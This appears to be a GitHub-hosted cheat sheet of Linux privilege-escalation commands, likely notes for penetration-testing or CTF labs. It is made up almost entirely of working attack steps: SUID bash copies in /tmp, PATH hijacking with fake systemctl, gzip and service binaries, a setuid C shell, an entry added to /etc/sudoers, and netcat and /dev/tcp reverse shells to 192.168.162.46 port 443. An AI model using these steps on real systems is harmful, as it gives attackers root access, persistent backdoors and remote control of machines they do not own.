-
Notifications
You must be signed in to change notification settings - Fork 0
/
mxrootbash
121 lines (92 loc) · 2.57 KB
/
mxrootbash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
===================================
Bash Script
vim /home/user/overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
chmod +x /home/user/overwrite.sh
watch -n 1 ls -l /tmp
/tmp/rootbash -p
===================================
Binary Check
strings /usr/bin/menu
ltrace /bin/whatever
===================================
Path Injecting Rootbash
echo -e '#!/bin/sh' > /dev/shm/systemctl
echo -e '/bin/sh' >> /dev/shm/systemctl
chmod +x /dev/shm/systemctl
echo $PATH | tr ':''\n'
export PATH=/dev/shm:$PATH
./zabbix-service
===================================
Python rootbash
#!/usr/bin/env python
import os, sys
#os.system('/usr/bin/touch /tmp/hello')
#os.system('bash -i /dev/tcp/192.168.162.46/443 0>&1')
#os.system('chmod 4755 /bin/bash')
os.system('cp /bin/bash /tmp/rbash; chown root:root /tmp/rbash; chmod +xs /tmp/rbash')
#!/usr/bin/python
import os, sys
os.system('cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash')
===================================
Python One-Liner
echo "os.system('cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash')" >> .getSyslog.py
/tmp/rootbash -p
===================================
Path Trick
sudo -l
/opt/scripts/access_backup.sh
ll /opt/scripts
cat /opt/scripts/access_backup.sh
gzip -c /var/log/apache2/access.log > blah,blah,access.gz
gzip is not full-path
which gzip /bin/gzip
echo $PATH | tr ':''\n'
export PATH=.:$PATH
export PATH=/tmp:$PATH
echo $PATH .:/usr/local/sbin:/usr/local/bin
vim priv1.txt
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.162.46 443 > /tmp/f
vim priv2.txt
#!/bin/bash
echo "m4lwhere ALL=(ALL) ALL" >> /etc/sudoers
vim priv3.txt
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
cp priv2.txt gzip
chmod +x gzip
Execute evil-gzip
sudo /opt/scripts/access_backup.sh
sudo su -
whoami
root
===================================
C rootbash
int main() {
setuid(0);
system("/bin/bash -p");
}
gcc -o name filename.c
===================================
Service Script
'/usr/bin/kick' script calls 'service apache2 start'
Vulnerable since it tries to run 'service' as root without a full path
This will run 'service' from path instead of the 'real' command
find / -type f -a \(-perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
/usr/bin/kick
strings /usr/bin/kick
strace -v -f -e execve /usr/bin/kick 2>&1 | grep service
vim service.c
int main() {
setuid(0);
system("/bin/bash -p");
}
gcc -o service service.c
echo $PATH | tr ':''\n'
export PATH=.:$PATH
/usr/bin/kick
root!